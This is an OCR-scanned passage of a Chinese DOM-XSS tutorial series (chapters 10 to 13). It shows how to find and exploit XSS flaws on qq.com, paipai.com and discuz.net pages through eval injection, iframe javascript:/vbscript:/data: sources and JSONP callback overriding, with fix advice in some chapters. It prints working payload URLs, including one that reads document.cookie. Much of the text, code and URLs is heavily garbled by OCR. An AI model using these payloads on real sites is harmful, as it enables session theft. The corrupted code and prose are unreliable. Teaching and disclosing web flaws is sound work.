str += " <embed widrth= + 加 height= + 有 name= + &leid 1 sretzs" ”4 UrFrl 4 quality=" autohigh' 
swlL iveconnect=" always” Wmode=" transparent” allowscriptAccess= Never allowFullscreen=" true” type= 
ppli shockwave-flash” pluginspage=" http:/ /waa. macromedia. com/go/getf lashplayer ></embed.: 


. COM 


http://qt.qq.com/video/play_video.htm?sid=aaaaaa%22%3E%3C/0ob]ject%3t 
| 一 一 一 ”nt 
非 冲 值得 说 明 的 是 : 
如 果 采 用 6.1 的 方法 ， 我 们 得 到 的 利用 代码 是 








http://gqt.qq.com/video/play_video.htm?sid=aaaaaa"></object><img Sr 
| 
! 这 个 代码 在 IE 下 ， 是 没 法 XSS 的 。 
而 通过 6.2 的 方法 ， 去 分 析 JS 代码 ， 我 们 则 可 以 构造 出 通用 的 XSS 代码 。 





http://qt.qq.com/video/play_video.htm?sid=aaaaaa%22%3E%3C/0ob]ject%3t 
.] ee 
这 也 反应 了 6.1 和 6.2 方法 各 自 的 优 缺 点 。 


修复 方案 


1. 修复 过 滤 上 的 逻辑 问题 。 
2. 注意 不 同 浏览 器 中 ， location.href 的 不 同 点 。 





10. Dom Xss 进 阶 [邂逅 eval] 


~ 


来 源 : 10. Dom Xss 进 阶 [ 淫 逅 eval] 


A 6 十 十 
简 要 接 述 


前面 的 教程 ， 说 到 了 显 式 输出 和 隐 式 输出 。 但 是 不 论 怎 么 样 ， 因 为 最 终 javascript 
都 会 通过 document.write 或 innerHTML 将 内 容 输 出 到 网 页 中 ， 所 以 我 们 总 是 有 办 
法 看 到 输出 到 哪里 。 但 是 有 时 候 ， 我 们 的 输出 ， 最 终 并 没有 流向 innerHTML 或 
document.write， 而 是 与 eval 发 生 了 淫 逅 ， 我 们 该 怎么 挖掘 并 利用 呢 ? 


详细 说 明 
1. 我 们 直接 上 例子 。 


http:Z/Lkf.dqq.com/search_app,shtm1L?Kkey=aaaaa 


和 前 面 的 不 同 之 处 ， 这 次 我 们 搜索 源 代码 和 调试 工具 都 看 不 到 任何 东西 。 
Yadiv Class="container simpLle™ 
<h23 扶 索 壮 果 */h2> 
vdiv class="searth"»y 
bb <div class="search too0l" .< /divS 
1--<*diVv ig="turn page"y--» 
b <dl class="dl list'"y..</dl> 
vv <div id="page” style="display: Nnones yy 
bb <div id="turn page™” class="peE" </dlivy 
< rdiv> 
OLY 
FULVY 
divy class="rl Uanbsp /div 
Hdiv> 
<dI IU=*"F00ter "S.C</dlivy 
<script type="text/Javascript"” src="http: //pineis.dqgq 
seript type="text/javascript"» 
ifttypeoftpevMainy == "function") 
peviiaint””, {senseParam;: "cl] ln 


/stript> 
i | i ] Ne 
2. 这 个 时 候 ， 我 们 可 以 看 看 Console， 看 看 有 没有 其 它 有 用 的 未 西 一 ~ 
一 般 来 说 ， 上 默认 情况 下 ， 是 不 会 有 问题 的 。 我 们 可 以 给 参数 加 一 些 特殊 符号 。 


这 里 我 比较 习惯 用 和 ， 因 为 这 玩意 比较 好 使 。 当 然 你 也 可 以 用 其 它 比较 特殊 的 符 
号 ， 上 比如 双 引 号 ， 单 引号 ， 只 是 个 过 滤 挥 的 几率 比较 大 。 


这 个 时 候 ， 我 们 看 看 Console 里 面 ， 多 出 了 一 条 错误 。 





红 潜 联盟 


那些 年 我 们 一 起 学 XSS 


As 和 二 kf.qq.com/search_app.shtml?key=aaaad\ 


腾讯 客服 


二 二 
sarVice . 99 .com 导航 出 硝 。 







































































口 搜 凌 洁 示 


(oi Hetwork | Soureces 【3 Timeline 








Fesources 





, | Elements 
"elincaygeht SyntaxError: Unexpected token ILLEGAL 
易 3ET http;y 


kbResource interpreted as Image but transferred with MIME type text/plair 
dm=kT+. COMEUr l= /search 日 te ea 了 








盘 ee i as. Image but transfterred with mim 加 | 在 i i 
p11=1990Rdm=kft .9. COMmeUFrlL= ‘search appshtmleare=kev%2 ra aacbp:b3 ben, 





我 们 可 以 点 右 侧 ， 下 接 定 位 到 错误 代码 。 







BUncaueht SyntaxError: Unexpected token ILLEGAL 





@ ET http:/ /kf.gqg.com/special/static special/index.html S88 (lnterna 
Error) special/static special/index.html:1 





A EResource interpreted as Imaee but transfterred with MIME tvpe text/plalin: 


3. 点 进去 后 ， 可 以 看 到 是 哪个 地 方 出 错 了 。 


rarg. na="", 
8 var Eetare = unctiont) 











| 守 

了 本: var Url = WEIFTdows Location.href: 

11| var allares = Url:splitt "2")[1]; 

12| i+ (allares!=null] && allares.lndexorfr"=")»a) 

3 1 

1]4 | var Sres = allares. splite "gg"): 

15 tortvar 1=8@;, lareEs.leneth; i+t++) 

了 后 攻 

Le var arge = res[i]: 人 

FE | : 5 : 

19 | 

28 | 

21 | 于 

| 

23 var HtmlAttributeEncode = functiontsstr’) 

3 | 

25| sstr = ssStr,.replacet/&/eE, "Samp;:"y,: 

26 sstr = sstr.replacet/y/e, "get,"),: 

27 | ssStr = ssStr.replace(/ /ey glt,"); 看 的 ; 史 
28| ssStr = ssStr.replacet/ "rE, &quot:”Y}: ot: 人 


| my 


我 们 来 看 看 这 段 代码 : 





Dom Xss 进 阶 [ 屠 逅 eval] 


42 


var getarg = function() 


var Url = window.1location.href,; 
var allargs = url.split("?")[1]; 
1f (allargs!=null && allargs.indexof("=")>0) 


{ 
var args = allargs.split("&"),; 
for(var i=0; i<args.1length; i++) 
{ 
var arg = args[i].split("="); 
evall( 'this. ‘+arg[0|]+'="'+arg[1il+’ a Os 
上 
上 


ys 


和 上 一 节 教 程 类 似 ， 这 段 代 码 ， 实 际 上 也 是 一 个 获取 地 址 栏 参数 的 代码 。 
比如 ， 地 址 栏 是 key=aaaa; 那么 arg[9] 就 是 字符 串 'key' ，arg[1] 就 是 
字符 串 'aaaa' ; 那么 eval 这 人 句 融 是 执行 的 eval('this.key="aaaa";') 
var getarg = functiont() 
-{ 
Var UrFr|] = window. location. href: 
var allargs = url.split(? [1]; 
i allargs!=null && allargs. indexof( = )>0) 


{ 
: War args = allargs.split(t 可 ); 
fortvar 1=0; 1<args. length; 1++) 


E : f 
: : var ar 日 = argslL1].spl1t( 


| i rg[1Ihl "; | 
i 
1 有 
一 
这 样 一 来 ，this.key="aaaa"; 这 句 就 被 执行 了 。 
4. 如 果 这 里 我 们 把 key 换个 写法 呢 ? 





this.key="aaaa"; this.key;alert(1);//="aaaa"; 


如 下 图 : 


this.|keyF"aaaa ; 






1 员 引 向 
那么 是 不 是 将 会 执行 我 们 的 alert(1); 呢 ? 
5. 根据 上 面 内 容 ， 我 们 可 以 构造 代码 。 


‘this.key:alert(1)} :wr 


http:Z/Lkf.dqq.com/search_app,.shtm1L?key;alLert(1);/ /=aaaa 


HOHO 一 ， 如 我 们 所 愿 的 璋 出 了 。 





-= pA 下 区 Es j 所 
总 http://kt.qqicomjsearch_appishtml?key:alert(l)j PD 7 XO kf.gg.com 


Dy 腾讯 客 县 


servic 总 本 二 取 | 






搜索 


CCtOMRs 
bs hed a OTT) 
6. 不 知道 看 完 上 面 的 ， 有 没有 娃 注 意 到 ， 后 面 的 aaaa 不 是 也 可 以 构造 吗 ? 


this.key="aaaa"，; 


换 为 


this.key="aaa";alert(1);//"，; 


确实 是 如 此 :) 


http://kf .gqq.com/search app.shtml?key=aaa";alert(1);// 


这 个 在 IE 下 一 样 是 可 以 的 。 


但 大 chrome 下 却 不 行 。 原因 其 实 上 面 一 节 教 程 也 提 到 过 。 chrome 会 自动 
对 > ，< 进行 转换 。 


因而 this.key="aaa";alert(1);//"; 会 变 成 
this.key="aaa%22;alert(1);//"; 从 而 失效 。 


7. 上 面 惑 是 本 篇 教程 了 ， 我 们 得 米 尖 有 题 外 话 。 其 实 以 上 问题 ， 不 是 单独 存在 的 。 
在 另外 一 个 页 面 也 是 存在 的 。 更 多 内 容 ， 参 见 见 本 篇 漏洞 修 复 。 


修复 方案 
参照 你 们 已 经 修复 的 类 似 文 件 即 可 。 


http://kf .qq.com/wsearch.shtml 


的 


http://kf .qq.com/Js/wsearch.]s 


本 来 上 面 这 个 文件 也 是 存在 漏洞 的 ， 估 计 这 个 位 置 已 经 被 人 报告 给 腾讯 了 ， 因 而 腾 
讯 加 了 一 次 防御 。 我 们 看 看 腾讯 的 防御 措施 。 


var getarg = function( )({ 
.,，， 省略 相 同 部 分 . , ， 
eval('this.' + arg[0| + = + HtmlAttributeEncode(arg[1|]) + 
,,，， 省略 相 同 部 分 . , ， 





也 就 是 说 ， 腾 讯 这 里 对 后 面 的 arg[1] 进行 了 过 滤 。 接着 ， 这 个 问题 又 被 再 次 报 
告 了 ， 因 而 前 些 时 候 ， 腾 讯 又 进一步 做 了 修复 。 


var getarg = function(){ 


..，， 省 略 相 同 部 分 ,. ， 
1f (arg[0] != null && arg[1| != null && (arg[0|] == 'page’' || al 
|| arg[0|] == key || arg[0|] == 'total') ) 
{ 
eval('this.' + arg[0| + =” + HtmlAttributeEncode(arg[1|]) 


上 
...， ， 省 略 相 同 部 分 ,. . 


EC 





一 次 ， 腾 讯 对 arg[0] 进 行 了 判断 。 


这 
哈 ， 补 了 东 墙 ， 补 丁 墙 。 不 过 呢 ? 补 了 这 个 Wsearch.js 文件 ， 还 有 我 们 现在 分 析 
的 这 个 (http://kf.qq.com/js/search app.jsl(http://kf.qq.com/js/search app.js) 文件 。 


11. Dom Xss 进 阶 [ 善 交 iframe] 








来 源 : 11. Dom Xss 进 阶 [ 善 变 iframe] 


简要 摘 述 


有 时 候 ， 输 出 还 会 出 现在 <iframe src="[ 输 出 ]"></iframe> 。 iframe 的 src 
属性 本 来 应 该 是 一 个 网 址 ， 但 是 iframe 之 善 变 ， 使 得 它 同样 可 以 执行 javascript， 
而 且 可 以 用 不 同 的 容 势 来 执行 。 这 一 类 问题 ， 我 将 其 汶 为 [路 径 可 控 ] 问 题 。 当 然 上 
面 说 到 的 是 普通 的 反 射 型 XSS。 有 时 候 程序 员 会 使 用 javascript 来 动态 的 改变 
iframe 的 src 属性 ， 和 车 如 : iframeA.src="[ 可 控 的 url1]"; 同样 会 导致 XSS 问 
题 ， 来 看 看 本 例 吧 人 一 


详细 说 明 
1. 先 来 说 说 iframe 的 变化 。 
1.1 最 好 懂 的 ，onload 执行 js 


<iframe onload="alert(1)"></iframe> 


1.2 src 执行 javascript 代码 


<iframe src="]Javascript:alert(1)"></iframe> 


3. IE 下 vbscript 执行 代码 


<iframe src="vbscript:msgbox(1)"></iframe> 


1.4 Chrome 下 data 协议 执行 代码 


<iframe src="data:text/html,<script>alert(1)</script>"></iframe> Cl 
国 Eee 
1.5 上 面 的 变 体 





<iframe src="data:text/html,<script>alert(1)</script>"></iframe> 


1.6 Chrome 下 srcdoc 属性 


<iframe srcdoc="<script>alert(1)</script>"></iframe> 


2. 有 兴趣 的 ， 可 以 一 个 一 个 的 去 测试 上 面 的 效果 ， 注 意 浏 览 右 的 特异 性 哦 。 
3. 接 看 我 们 来 看 看 具体 的 例子 。 


http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=aaaaaa&g1( 
4 
4. 我 们 先 开 调试 工具 ， 看 看 有 没有 可 见 的 输出 。 





Pb 《alY ClaSS=° TI1TLIES” p</ 加 工业 了 
vdlyv class=" left=boxy> 
b <itrame id="toolframe" src="naanaabelid=ylacid=68" onload="SetWinHeiel 
allowtransparency="true” scroTTiInes ' marginwidth="@" mareinheieht=" 
bb <div class="Votebox" ld="vVotediv” style="display none "ycC/divy 
pp id="voted tips" class="VOtebox" style="displav :inone: "> 咸 大 你 佳 用 该 了 






/diyV> 
bb <div class="r1ight-box"S>..</ diV> 
< div> 
了 = = 已 和 可 mainer--» 
/ddEV> 








seript type="text/javascript" src="http: 
kb <div id="footer ied"y..</divs 

seript CARE ESE) 人 CTO SC 
bb <script laneuage=" 


«seript src="htt ep fe .Com ine ied, 1s"»</s 七 
中 i Pi 看 本 We 让 -站 -上 一 二 和 一 计 Pe = 于 SE 日 关 
aaaaad | of 1 [WY (Cancel) Cctos 


可 以 看 到 ， 我 们 参数 的 aaaaaa 被 带 入 到 了 <iframe src=" 这 里 "></iframe> 。 
这 样 一 来 ， 束 满足 了 我 们 的 使 用 条 件 。 我 们 试 试 


http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=javascripi 











。。 竟然 没 反 应 。 我 们 来 看 看 刚才 的 那个 地 方 。 


</div> 
Tv<div class="left-box"> 
v<iframe 1d= 
bb #document 
</iframe> 
bp <div class="Votebox"” id="votediv" style="display:r 
<p lid="voted tips"” class="votebox” style="display: 
</div> 
v<div class="rieht-box"> 
<dv class="l0oginbox"> 
bp <div id="unloein" style="display!: none >ogdIV> 
bp <div id="logined" style="display!: block,">.. </div 
«seript type="text/javascript" " 
<script type="text/Jjavascript" 
<script type="text/javascript" 
<SCEript type="text/Javascript" 
<sCript type="text/Javascript" 
辆 | - 吧 


| 





| | I 
onload="SetWinHeieht (tl 











ee eh 


一 到 村 旺 
toolframe 1 | Av| | Cance a DO.com 





















































Ce 


可 以 看 到 ，src 这 次 没 属性 了 ， 看 来 腾讯 做 了 什么 过 滤 。 我 们 继续 搜索 下 一 


toolframe 试 试 。 


筷 ， 看 来 项 是 这 段 代 码 导 致 的 。 


《SCErlpt type="text/javascript” src="/common 
VT<script laneuage="Javascript"y> 
/rifame 打 开 内 容 
function OpenFrame(url) 1{ 


if (url.toLowerCase(),.indexOf{t'http://") != '-1° || url.toLow 
document .getElementById( 


J).src = Url; 








} 
var tool_ url = getQuerystrineValue("turl"); 


war ir = eetiiieruttereineVialnel "oid"l: 


一 起 看 看 这 段 代 码 。 


function OpenFrame(url) 1{ 
if (url.toLowerCase().indexOof('http://') != -1 | 
Url.toLowerCase().indexOof('https://') != -1 | 
UrJ .toLowerCase( ) .Indexof( ]javascrlIpt: ) != '-1°') 
return false; 
document .getELementById( toolLframe ).Src = url; 


不 难看 出 ， 腾 讯 对 javascript: 做 出 了 判断 。 


document .getELementById( toolLframe ).Src = url; 


那些 年 我 们 一 起 学 XSS 


这 句 是 导致 XSS 的 一 句 代 码 。 而 openFrame 的 url 参数 则 来 自 于 (无 关 代 码 省 
略 ) : 


Var tool url = getQueryStringValue("turl"); 


openFrame(tool_url]); 


5. 根据 我 们 上 面 说 道 的 iframe 的 利用 方法 ， 我 们 不 难看 出 ， 腾 讯 的 过 滤 是 不 完善 
的 。 


在 IE 下 ， 我 们 可 以 使 用 vbscript 来 执行 代码 。 vbscript 里 ' 单 引号 表示 注释 ， 类 似 
JS 里 的 // 


http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=vbscript:r 





加 | 


tp://helper;:qq.com/appweb/tools/too|l-detail.shtmliturl=vbscriptmsgbt 全 全 0 | 人 
















车 Javascript 提醒 
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12. Dom Xss 进 阶 [路 径 con] 


来 源 : 12. Dom Xss 进 阶 [路 径 con] 


我 不 是 苏 莉 con, 我 是 路 径 con。 


一 些 程序 员 会 动态 的 加 载 json 数据 ， 同 域 的 时 候 ， 可 以 使 用 ajax ; 而 有 时 候 ， 数 
据 所 在 域 和 当前 页 面 所 在 域 又 不 一 致 。 所 以 需要 跨 域 请 求 。 跨 域 请 求 数据 的 手段 
中 ， 有 一 种 叫做 jsonp。 


用 代码 表示 的 话 ， 融 是 


somescript.src="http://otherdomain.com/xx?]sonp=callback" 


菏 些 时 候 ， 程 序 员 会 在 调用 外 部 数据 的 时 候 带 上 可 控 的 参数 。 


somescript.src="http://otherdomain.com/xx?]sonp=callback&1id="+1d; 
如 果 这 个 id 我 们 可 控 ， 将 可 能 带 来 XSS 问题 。 
详细 说 明 


A dm 样 ， 去 细 说 操作 过 程 了 ， 前 面 的 几 次 教程 也 基本 将 常用 
操作 全 部 介绍 到 了 。 直接 来 看 例子 。 


1. 在 扫 朱 过 程 中 ， 经 剖 遇 到 下 面 的 例子 。 





EE 





Emd: purimetoar- [type] allow-[ ] url- [hitp: /bae. palpati, com seur eh List, shtml? tspe= p=4d4100., Zapr obas er chtype-2 or L000 


扫 舞 列表 扫地 络 情 周 试 福 出 往 滞 加 se + 且 站 位 折 3 久 入 作为 了 这 个]3 交 件 的 关 趣 


[npnc Sp Sd ce -am keayword=2012 Ej a pe E 
rr Inastate=2&amppavbype=d&anm :rankin 三 ]&amp:sclassid 

} PDayuyp p; 9 BD 
-hrceabt=e i = er-= tr 


2. 初 看 看 ， 这 种 情况 ， 似 乎 没有 什么 利用 价值 。 

3. 但 是 我 们 不 难 想象 ， 如 果 这 个 地 址 是 我 们 可 控 的 话 ， 一 样 会 带 来 威胁 。 

地 址 的 可 控 可 以 分 为 3 个 层面 。 

3.1 script src=" 完 全 可 控 " ,这 种 丈 简 单 了 ， 下 接 将 地 址 换 为 我 们 的 JS 地 址 


3.2 script src="/path/xxx/[ 路 径 可 控 ]/1.js" 这 种 要 利用 的 话 ， 需 要 同 域名 
下 有 可 控 的 文件 。 可 控 文 件 又 分 为 2 种 。 


3.2.1 可 以 直接 上 传 文本 至 同 域名 下 ， 不 一 定 要 是 HTML 文件 ， 需 要 上 传 点 有 过 小 
缺陷 。 


3.2.2 参数 可 控 ， 利 用 可 用 的 json 接口 。 













&amp: t=1354854502"»> c/s seript: lescTipt 





终 变 为 Script src="/path/xxx/.../yyy/Xx.json?callback=alert(1)" 


沸 


3 
script src="/xxxx/json.php?callback=xxxx&param1=yyy&param2=[ 参 数 可 控 ] 


这 种 情况 ， 和 3.2.2 类 似 ， 如 果 参 数 可 控 ， 且 json 的 参数 没有 很 好 的 过 滤 时 。 我 们 
残 有 机 可 乘 了 。 


4. 本 文 以 拍 拍 网 一 处 XSS 为 例 ， 来 描述 以 上 可 能 性 。 


扫描 器 打 到 的 点 ， 见 步骤 1 中 的 图 。 进 一 步 ， 我 们 可 以 通过 抓 包 的 方式 ， 看 到 页 面 
在 打开 时 ， 所 加 恤 的 外 部 JS 文件 地 址 。 


http://ssei.paipali.com/comm_ Json?callback=commentListCallBack&dtag: 
加 | 


我 们 打开 这 个 JSON， 用 扫 拍 反射 型 的 方式 ， 可 以 测试 出 ，callback, dtag 以 及 
ranking 可 控 。 但 均 无 法 使 用 < ，> ， 也 就 是 说 ， 这 个 JSON 接口 本 身 是 无 XSS 
风险 的 。 此 外 dtag, 和 ranking 都 在 双 引 号 里 面 ， 我 们 在 后 续 无 法 进行 利用 ， 而 
callback 则 在 最 前 面 ， 上 比较 好 控制 。 我 们 可 以 想象 下 ， 如 果 我 们 可 以 让 这 个 页 面 调 
用 : 





http://ssel1.paipai.com/comm Json?callback=alert(1); 


4.1 直接 控制 callback 参数 ， 但 是 从 实际 情况 来 看 ， 我 们 此 你 无 法 直接 控制 它 ， 
【失败 】 


4.2 将 后 面 的 参数 ， param=xxx 修改 为 param=xxx&callback=alert(1) ， 从 而 
覆盖 前 面 的 callback 


5. 上 面 说 到 的 第 2 种 方案 ， 似 乎 可 行 。 但 是 实际 上 还 是 有 问题 的 。 

譬如 我 们 页 面 上 的 type 参数 ， 对 应 着 json 的 sclassid 参数 。 我 们 访问 以 下 地 址 : 
http://bag.paipali.com/search list.shtml?type=&callback=alert(1);&nl 

六 | 


de ye J 的 。。 因 为 & 本 身 融 是 参数 分 隅 符 。 这 样 写 type 残 
为 灾 了 能 很 快 融 有 人 想到 另外 一 个 写法 : & 写 为 %26 





http://bag.paipai.com/search list.shtml?type=%26callback=alert(1);t 
es 





很 好 ， 但 是 实际 上 ， 你 会 发 现 ， 访 问 的 json 接口 的 参数 也 还 是 原封 不 动 的 %26 ， 
而 不 是 所 希望 的 & 


"RHP /sselL papal.com 







comm json?callback=commentbistCallBack&dtag=1&ac=Ta&cluster=1&sellquality 





3ET jcomm json?callback=commentListCallBack&dtag=1&Qac=1&cluster=1&sellgquall 
y= OaNewProp= a&Property= 256QPageNum=1&PageSize=48QOrders 
yle=80&Address=B&Salelype=l&degree=1&QAuthType=2QBeginPricee= 虑 EndPrice= 
auKeyWord=&OnlineState=2&Paytype=4&ranking= lasClassid-|3626callbackt-alert(l) 
Bt=1354861616&g tk=348624959&g ty=ls HTTP/1.1 


6. 为 了 看 看 参数 是 怎么 从 页 面 ， 传 递 到 了 comm json 这 个 接口 上 的 。 我 们 定位 到 
以 下 代码 。 


http://static.paipaiimg.com/]Js/search.]s?t=20121108 


function jinit() { 
var keyword = decodeURIComp($getQuery( 'keyword')), type = $get( 
searchtype = $getQuery( Searchtype  ) ; 
option.keyword = keyword; option.classId = type; 
option.searchType = searchtype || option.searchType; 
option.beginPrice = $getQuery( bp ) ; 
option.endPrice = $getQuery( ep ); 
option.NewProp = $getQuery('np') || $getQuery( newprop - ) ; 
option.property = $getQuery( pro ) || option.property; 
option.cid = $getQuery( 'cid' ); 
option.Paytype = $getQuery( pt ) || option.Paytype; 
option.hongbaokeyword = $getQuery( hp ); 
option.conditionStatus = $getQuery( cs ) || option.conditionSte 
option.showType = $getQuery( show ) || option.showType; 
option.mode = $getQuery( mode ) || option.mode; 
option.address = decodeURIComp($getQuery( adr )); 
option.orderStyle = $getQuery( os ) || option.orderStyle || 80， 
option.hidekeyword = $getQuery( hkwd ) == true” ? true: false， 
option.ptag.currentPage = $detQuery( ptag ) || $getQuery( "PTAG 
var pageIndex = $getQuery( p1L )， 
pageSize = $getQuery( ps ) ; 
option.pageIndex = (pageIndex && $1lisPInt(pageIndex)) ?2 pageInd 
option.pageSize = (pageSize && $1isPpInt(pageSize)) ?3 pageSize * 





在 这 个 文件 里 ， 我 们 很 容易 的 看 出 ， 当 前 页 面 参 数 和 json 参数 的 对 应 天 系 
option,JSON 参数 =$getQuery(" 页面 参数 " ) 


7. 一 个 函数 让 我 眼前 一 亮 啊 ， decodeURIComp 。。 也 就 是 说 ， 传 人 的 keyword， 
会 解码 一 次 。 


也 就 是 说 ， 如 果 我 们 keyword=%26callback=alert(1); decodeURIComp 就 会 
变 为 &callback=alert(1); 为 了 证 明 我 们 的 想法 : 我 们 曾 接 写 利 用 代码 。 注 蕊 
keyword= 那 一 部 分 


http://bag.paipai.com/search list.shtml?type=213280&np=11&pro=256&: 
加 = 
8. 看 效果 : 弹 了 吧 
全 http:y/b: /bas,PalpalLcormsearch- list. shtml? ty De-21328085 SEE: Dp- 区 x || 口 和 


ES = = 


Qek 网 拍 折 ”人 Q 丙 城 ” 受 思 


| 来 自 网 页 的 江 了 本 1) 制 1 [Si 














和 historyKeyword=%2526callback%253Devald28strnng.fromCharc 
ode3628979%252C1089%252C101%252C114%252C116%252C40362 
J2C100%252C111%252C9936252C11736252C1098%8252C101%252 
Cll0252C110%2 2C400 .29029996252C111%252C111%252C10 
796252C1059%252C101962520C419629962996253Bvold， 








请 


抓 包 可 以 看 到 ， 被 动态 加 载 的 keyword 参数 ， 我 们 在 后 面 插入 了 一 个 callback， 
盖 了 前 面 的 callback 





RE ee 
-< EOMM json 村 | 上 叶 且 丰 区 二 MA entlisttallBackikr 器 划 回 二 1 ratc=1imhcluster 


一 -一 一 = 一 一 一 一 一 一 -一 EY | i 





GET /comm json a commentListCallBackP dtag=1&ac=1&rcluster=1&sellquall 


ty=0a&NewProp= wy QProperty=256&PageNum=1&PagedSize=48QOrders 
tyle=80B&Address=& 棋 Type= Vater 1&AuthType= 2&Beginpnce= QEndPrice= 


KevyiNord Btallback ba 













me | UIToM 


ranb 1 T354561954 TT 


| keywordi 和 入 日 tallback 策 闫 了 前 列宁 








es 一 E 一 Eee Er 一 es 一 I FE 一 PE 一 i 
] 


同样 ， 看 到 返回 的 comm_json 的 内 容 


vemnew Request Response [Summary | Chart | Notes| 












evallSstring.iromCharCodeld?,108,101,114,116.40.100,111,99.117.109,101,110.116.46,99,111,111,107.105.101.41))ryord 


1. 也 可 对 jsonp 接口 的 callback 参数 进行 更 加 严格 的 字符 控制 ， 一 般 的 callback， 
只 需要 允许， 字母 ， 数 字 + 下 划 线 即 可 。 


13. Dom Xss 实例 [Discuz X2.5] 
来 源 : 13. Dom Xss 实例 [Discuz X2.5] 
简要 拍 述 


我 们 教程 的 DOM XSS 殊 到 这 里 了 。 最 后 册 给 大 家 送 上 一 个 实例 。 希 望 大 家 能 够 体 
会 到 : XSS 的 上 下 文 非常 重要 ， 如 何 结合 上 下 文 ， 利 用 未 过 滤 字 符 ， 合 理 的 构 
才 是 成 功 的 关键 。 


详细 说 明 
1. 我 们 直接 看 实例 点 。 


http://www.discuz.net/connect.php?receive=yes&mod=login&op=callbacl 





2. 可 以 看 到 我 们 的 aaaaaaaaaa 在 源 代 码 里 有 2 处 输出 。 


| En -大 ‘ail - re IEC Lz.niet i i 而 Br 1 | , I i 忆 F EWE 一 王 忆 主人 1 瑟 条 = | 右 可 由 Vi E J [i 己 | iat 已 SS: ei 
rtpe” 3》 布 子 总 ae iyi hret=" javasctipt::" 
bre= tort/ javascript”» 4 
ee sebar , “小 









l= stylesheet types= ee href=", i 
‘Wp Class= Wp ?CH d= Class= Wh El Ww » : 
ss= WE » | 
= 机 了 生硬” | 1 
地 自 过 二 支 窜 世 蕊 二 二 二。 记 业 洒 王 于 = 站 卫 丰 民 二 ， 寺 交 下属 * | 
当前 存在 网 欠 问题 或 服务 器 里 民 ， 人 许 泌 锚 讶 ; comect_error_code_ 0 i 人 让 《 章 世 者 = blank 


BXE Aw A ANE SN yopanid signature invalide hp 请 从 你 
| setTimeout " window, location, href = http:/ way. discuz. dl 
= Lert btnlett 2 herefs httpi/y wow. di sceur, net/. /Nau 
Bz 


3. 看 第 2 处 ， 我 们 需要 用 双 引 号 闭合 ， 但 是 显然 dz 不 会 给 我 们 这 么 明显 的 机 会 ， 
被 拦 稚 了 。 







区- Ee Wy , ecu. net neet.nhee | iD 二 = Ler |lne lcsrreh 
Discuz! Systerm Error 


* 您 当 朋 的 访问 讲求 当 忠 富有 非法 字符 ; 已 经 被 笃 训 拒 涪 
PHP Debuwa 


遇 [Line: B029]connact.php(require_once) 

® [ine: B831]s0urce/class/rlass core php(core:: trentapp) 

[Lime: doa6]sounce/class/class core.phpldiscur pplication: :Instance) 

和 ELine: G851]source/class/discuz/discus. apnlication, phptdiscur application-y. construct) 
1 站 . plication, phptdisrur, application-» ee 
[Line: 6312]source/class/d1scuz/ dlseus application. php(discur applic ii SS ci 
本 [Line: 8347]source/class/discur/diacur Bpplication. php(system erron) i 
-二 [FLine: B017]sourcel function/ finetlon core.phpldiseur ernroer: rsystem el 上 i 出 
四 [line: S14]sourcerclass/discur/discur errar, phptdiscur enrons se HR 


4. 我 们 把 目光 放 在 第 一 处 ， 这 一 处 很 特殊 ， 位 于 setTimeout 函数 的 第 一 个 参数 
里 ，setTimeout 的 第 一 个 函数 会 料 字符 串 作 为 脚本 来 执行 。 


我 们 把 这 一 部 分 代码 提取 出 来 。 











<script type="text/Javascript" reload="1">setTimeout("window.1locat: 


我 们 首先 能 想到 的 是 闭合 挥 单 引 号 ， 但 是 这 里 单 引号 已 经 被 过 


esmmod=IlogmA&op=callbacktreterer=aaaaaaaaaaa toauth toke 





amp :tormash=sdddal amnp' searchsubmit=truekamp. SOuUrcg=hotsearch t 


a href=" javascript::” rel="forum” class=" curtwype" } 由 了 < ay li><]i> 


track/static/ stvyle/issuetrack. casT?idgT” /> 





e 0; 展 证 导 码 : *a tarezet= blark 
DE EE aU , | 
.location. href = http: /wn discur. IE /daaadddaadai dd ,00) 


5. 那么 是 不 是 就 没有 办 法 了 呢 ?我 们 可 以 看 到 setTimeout 的 第 一 个 参数 是 字符 
串 ; 我 们 前 面 的 教程 里 说 过 一 次 ，JS 字符 串 中 ， 字 符 还 可 以 表示 为 unicode 的 形 
式 。 即 : 单 引 号 还 可 以 表示 为 \u0027 或 \x27 。 带 着 这 个 想法 ， 我 们 可 以 试 试 
\ 有 没有 被 过 滤 。 幸运 的 是 ， 这 里 还 真 没 过 滤 


&mod=Iogin&op=callbacx&relerer=aaaaaaaaaaad\cgoauth 


， 销 亿 舍 码 : <a target= blank 

了 冀 癌 日 六 晶 1] 疡 ES 间 总 5 赤 EGS 1 EEF 和 NLES9E 人 1 各 ESF 于 
cation. href = http: /wny. disctz. net/. /daaadaaddad : , 2000): 
%"> 划 果 您 的 浏览 如 军 有 自动 幅 转 ， 肖 点 击 此 链接 a>< 人 D> 





入 


6. 接 看 我 们 融 是 构造 代码 了 。 首先 写 好 代码 。 


<script type="text/Javascript" reload="1">setTimeout("window.l1ocat: 
”了 
将 里 面 的 引号 变 为 \u0027 





<script type="text/Javascript" reload="1">setTimeout("window.l1ocat: 
.4 RN 
代入 到 URL 里 。 





http://www.discuz.net/connect.php?receive=yes&mod=10ogin&op=callbacl 
la | 
可 以 看 到 弹出 了 cookies。 





， es a 后 Se Er i 4 站 EE as | et (Ne ge St op ee ee EE 
www.discuz.net/connect.php?*recelve=yes&mod=logiIn&op=ctallback&refterer=a\u0027:alert({document. 
于 本 | | 了 





7. 其 实 这 里 存在 一 个 问题 。 这 段 JS 代码 里 ， 第 一 句 是 
location.href=" 某 个 地 址 "; 上 面 我 们 所 演示 的 ， 是 一 个 alert， 暂 停 了 
location.href 的 发 生 。 


如 果 我 们 把 alert(document.cookie); 换 成 插入 某 个 JS 文件 的 脚本 人 代码， 就 


会 出 现 问题 。 


即 : JS 文件 还 没 来 得 及 加 载 ， location.href=" 某 个 地 址 "; 这 名 就 会 被 执行 ， 
从 而 跳 转 到 另外 一 个 页 面 了 ， 继 而 导致 失效 。 


8. 所 以 这 里 ， 我 们 有 必要 改进 下 执行 JS 的 办 法 。 如 下 ， 


我 们 可 以 和 直接 让 代码 变 成 执行 
location.href="jJavascript:alert(document.cookie)"; 
location.,href=' 原 来 的 字符 串 ' , 蔡 换 (所 有 字符 , "新 的 字符 "); 


<script type="text/Javascript" reload="1">setTimeout("window.l1ocat: 
| 本 
同上 ， 蔡 换 单 引号 ,加 号 什么 的 。 





<script type="text/Javascript" reload="1">setTimeout("window.l1ocat: 
"| 必 } 
